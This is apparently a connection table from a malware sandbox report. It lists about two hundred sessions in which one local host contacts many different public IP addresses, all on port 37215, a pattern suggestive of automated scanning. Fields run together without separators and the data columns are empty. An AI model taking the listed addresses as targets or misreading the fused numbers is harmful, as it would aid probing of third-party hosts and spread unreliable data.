                                                  9360192.168.2.135607041.250.218.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9361192.168.2.1334686131.253.29.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9362192.168.2.133496041.240.53.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9363192.168.2.1359172197.190.159.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9364192.168.2.134278441.75.156.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9365192.168.2.135606041.136.226.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9366192.168.2.1344400193.162.197.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9367192.168.2.135704678.154.145.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9368192.168.2.1360670197.13.122.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9369192.168.2.1357530157.12.26.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9370192.168.2.1345540197.96.42.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9371192.168.2.134609235.37.36.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9372192.168.2.1348384157.74.213.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9373192.168.2.1347478197.20.161.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9374192.168.2.1347546157.132.40.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9375192.168.2.1348364157.105.218.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9376192.168.2.1347248157.205.138.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9377192.168.2.1343768175.123.33.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9378192.168.2.134154241.90.165.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9379192.168.2.1350298197.203.75.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9380192.168.2.136059066.255.18.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9381192.168.2.135180041.120.217.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9382192.168.2.1340332129.77.22.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9383192.168.2.1334368197.130.43.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9384192.168.2.1353448197.139.102.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9385192.168.2.133323441.122.106.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9386192.168.2.1351608157.173.39.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9387192.168.2.1352180157.193.122.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9388192.168.2.1339804197.202.108.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9389192.168.2.1354282107.112.74.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9390192.168.2.1334248157.224.79.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9391192.168.2.133513041.0.255.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9392192.168.2.1351460157.167.194.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9393192.168.2.1354950197.45.171.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9394192.168.2.134046241.205.249.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9395192.168.2.1333864157.24.10.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9396192.168.2.135471496.33.250.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9397192.168.2.1338954197.254.131.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9398192.168.2.1343716211.232.49.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9399192.168.2.1353708157.6.232.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9400192.168.2.1355532157.222.248.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9401192.168.2.1351418172.10.234.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9402192.168.2.134497841.103.245.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9403192.168.2.134340241.246.5.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9404192.168.2.1339720157.226.232.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9405192.168.2.1356214157.107.92.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9406192.168.2.1357300125.63.206.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9407192.168.2.135500241.161.98.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9408192.168.2.1338374197.111.249.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9409192.168.2.1337542197.40.70.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9410192.168.2.135375241.35.147.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9411192.168.2.1359656157.178.12.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9412192.168.2.1352574197.162.120.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9413192.168.2.1359046197.129.104.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9414192.168.2.1337066157.177.92.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9415192.168.2.133941641.86.75.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9416192.168.2.134374441.69.102.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9417192.168.2.135851641.95.197.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9418192.168.2.1355260157.25.67.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9419192.168.2.1347602197.115.70.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9420192.168.2.1349046157.183.63.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9421192.168.2.1337280197.174.45.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9422192.168.2.1342724157.85.131.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9423192.168.2.135715641.221.225.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9424192.168.2.1348060197.128.169.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9425192.168.2.1355430157.158.54.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9426192.168.2.135131241.140.45.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9427192.168.2.1350456157.205.211.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9428192.168.2.134000871.43.199.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9429192.168.2.1348412157.215.52.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9430192.168.2.1345042157.234.68.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9431192.168.2.1359108197.88.229.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9432192.168.2.1352584158.149.229.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9433192.168.2.135546641.57.219.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9434192.168.2.1342672157.143.39.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9435192.168.2.134020254.212.13.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9436192.168.2.1345108157.46.71.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9437192.168.2.1343122197.26.146.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9438192.168.2.134340687.190.164.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9439192.168.2.1346994155.208.235.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9440192.168.2.1351186197.15.140.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9441192.168.2.133549241.27.160.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9442192.168.2.1342524157.51.214.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9443192.168.2.1342156197.120.198.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9444192.168.2.135191441.171.102.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9445192.168.2.1357084157.20.109.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9446192.168.2.135800641.164.177.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9447192.168.2.1360078197.88.232.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9448192.168.2.1359234197.183.192.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9449192.168.2.1333138197.39.147.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9450192.168.2.1341570157.19.30.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9451192.168.2.1359266222.104.163.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9452192.168.2.1334280197.102.74.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9453192.168.2.1358336197.29.130.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9454192.168.2.1340678162.44.125.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9455192.168.2.135032241.60.54.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9456192.168.2.1345732197.202.206.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9457192.168.2.1337524197.178.141.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9458192.168.2.1340174157.70.239.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9459192.168.2.1348128197.196.247.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9460192.168.2.1336782157.86.221.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9461192.168.2.1343070157.66.151.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9462192.168.2.1339622157.225.130.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9463192.168.2.1351424157.60.171.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9464192.168.2.135566841.120.131.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9465192.168.2.1335590157.147.15.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9466192.168.2.1343646197.1.113.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9467192.168.2.134676241.215.50.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9468192.168.2.136059641.225.86.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9469192.168.2.135743041.111.119.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9470192.168.2.134874869.72.216.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9471192.168.2.1348756197.153.218.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9472192.168.2.1351216157.249.59.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9473192.168.2.1338700195.24.236.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9474192.168.2.1350912157.111.144.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9475192.168.2.1340694157.106.173.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9476192.168.2.1334662151.16.229.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9477192.168.2.1340834157.73.105.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9478192.168.2.1355518197.146.122.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9479192.168.2.1360202157.97.193.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9480192.168.2.133752241.100.46.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9481192.168.2.134869441.74.168.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9482192.168.2.134912041.109.251.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9483192.168.2.1342708157.97.9.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9484192.168.2.13354181.117.88.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9485192.168.2.1358186133.115.143.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9486192.168.2.1351292157.0.162.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9487192.168.2.133809241.88.65.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9488192.168.2.1357578197.140.129.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9489192.168.2.133818061.224.122.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9490192.168.2.1336588197.118.237.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9491192.168.2.1335530197.208.143.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9492192.168.2.1355368121.52.17.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9493192.168.2.1337686157.44.49.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9494192.168.2.134032096.29.35.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9495192.168.2.1341072157.150.22.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9496192.168.2.1357048157.189.31.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9497192.168.2.1340928197.65.114.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9498192.168.2.1357922157.41.110.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9499192.168.2.136082441.143.248.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9500192.168.2.133469441.139.179.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9501192.168.2.134561641.244.42.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9502192.168.2.135101465.23.119.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9503192.168.2.133821441.28.57.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9504192.168.2.1336522197.160.98.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9505192.168.2.1354598197.130.15.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9506192.168.2.1341638197.80.135.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9507192.168.2.1350878157.30.87.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9508192.168.2.1347786147.205.199.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9509192.168.2.1345238197.184.182.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9510192.168.2.136027641.188.252.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9511192.168.2.135183041.119.116.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9512192.168.2.1347218197.118.149.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9513192.168.2.133592441.133.168.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9514192.168.2.134843841.241.89.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9515192.168.2.1355674197.206.98.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9516192.168.2.135240852.169.16.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9517192.168.2.1354592108.176.211.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9518192.168.2.133377441.5.56.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9519192.168.2.134274441.45.42.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9520192.168.2.1342676197.67.250.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9521192.168.2.1337870111.232.248.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9522192.168.2.1360542158.232.171.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9523192.168.2.1359330157.163.45.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9524192.168.2.1341322159.8.252.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9525192.168.2.1334198197.240.6.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9526192.168.2.1336648139.159.241.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9527192.168.2.1337666157.102.37.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9528192.168.2.134540841.183.102.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9529192.168.2.133834041.200.115.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9530192.168.2.133868284.134.225.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9531192.168.2.1336810157.221.172.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9532192.168.2.134845241.231.73.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9533192.168.2.135387641.218.248.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9534192.168.2.135061841.86.129.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9535192.168.2.1333488157.88.228.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9536192.168.2.133898841.38.226.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9537192.168.2.135745641.212.95.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9538192.168.2.1357962157.53.243.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9539192.168.2.1340954197.235.142.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9540192.168.2.1347102157.66.3.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9541192.168.2.1337304138.114.135.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9542192.168.2.135551241.74.163.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9543192.168.2.134188641.34.128.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9544192.168.2.135459041.82.43.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9545192.168.2.1343616157.92.172.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9546192.168.2.1351488157.253.84.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9547192.168.2.1359378157.243.86.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9548192.168.2.136010241.252.54.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9549192.168.2.1345348197.203.197.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9550192.168.2.134408090.44.126.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9551192.168.2.1351006197.26.196.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9552192.168.2.1353050157.42.191.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9553192.168.2.134127041.209.206.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9554192.168.2.1351978197.241.111.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9555192.168.2.1345872157.87.27.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9556192.168.2.1335596222.16.177.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9557192.168.2.135688241.248.75.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9558192.168.2.1357786106.17.51.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9559192.168.2.134866648.219.20.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9560192.168.2.135149041.169.92.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9561192.168.2.133316883.254.255.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9562192.168.2.1352704157.12.73.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9563192.168.2.1340128157.112.11.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9564192.168.2.134697823.213.70.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9565192.168.2.133687814.122.158.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9566192.168.2.1356204157.241.130.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9567192.168.2.1339354197.151.197.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9568192.168.2.1358960157.155.86.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  9569192.168.2.1358958197.96.215.18437215
